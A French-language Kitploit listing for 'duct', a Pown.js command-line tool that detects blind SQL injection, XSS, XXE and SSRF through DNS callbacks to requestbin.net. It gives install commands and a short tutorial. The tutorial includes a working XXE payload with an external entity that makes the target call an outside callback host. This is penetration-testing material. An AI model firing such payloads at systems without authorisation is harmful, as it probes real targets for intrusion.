Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
duct — Outil essentiel pour trouver les attaques par injection aveugle. | Kitploit
Outils/GitHubGitHub/pownjs/duct
Exploitation d'Applications WebCollecte d'InformationsAnalyse DNS
GitHubpownjs/duct

duct

Outil essentiel pour trouver les attaques par injection aveugle.

Voir le dépôt
4913il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Follow on Twitter NPM Fury

Pown Duct

Outil essentiel pour trouver des attaques par injection aveugle via des canaux latéraux DNS.

Crédits

Cet outil fait partie de l'initiative open-source de secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB : Cet outil utilise le service http://requestbin.net. Les futures versions utiliseront une infrastructure dédiée et faite sur mesure.

Démarrage rapide

Cet outil est destiné à être utilisé dans le cadre de Pown.js, mais il peut être invoqué séparément en tant qu'outil indépendant.

Installez d'abord Pown comme d'habitude :

root@kitploit:~
$ npm install -g pown@latest

Invoquez directement depuis Pown :

root@kitploit:~
$ pown duct

Sinon, installez ce module localement depuis la racine de votre projet :

root@kitploit:~
$ npm install @pown/duct --save

Une fois cela fait, invoquez pown cli :

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

Vous pouvez également utiliser le pown global pour invoquer l'outil localement :

root@kitploit:~
$ POWN_ROOT=. pown duct

Utilisation

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutoriel

Il existe des cas où nous devons effectuer une attaque telle qu'une injection SQL, XSS, XXE ou SSRF, mais l'application cible ne fournit aucune indication qu'elle est vulnérable. Une façon d'être sûr qu'une vulnérabilité est présente est d'essayer d'injecter un vecteur d'attaque valide qui force un résolveur DNS à interroger un domaine contrôlé. Si la résolution réussit, l'attaque sera considérée comme réussie.

NOTE : Vous connaissez peut-être Burp Collaborator qui fournit un service similaire à ses clients.

Tout d'abord, nous avons besoin d'un nom DNS jetable à résoudre :

root@kitploit:~
$ pown duct dns

capture d'écran

En utilisant le DNS fourni, composez votre charge utile. Par exemple, ce qui suit pourrait déclencher une résolution DNS si une vulnérabilité XXE est présente.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Si l'attaque a réussi, nous recevrons un message dans le terminal.

capture d'écran

Télécharger l’outil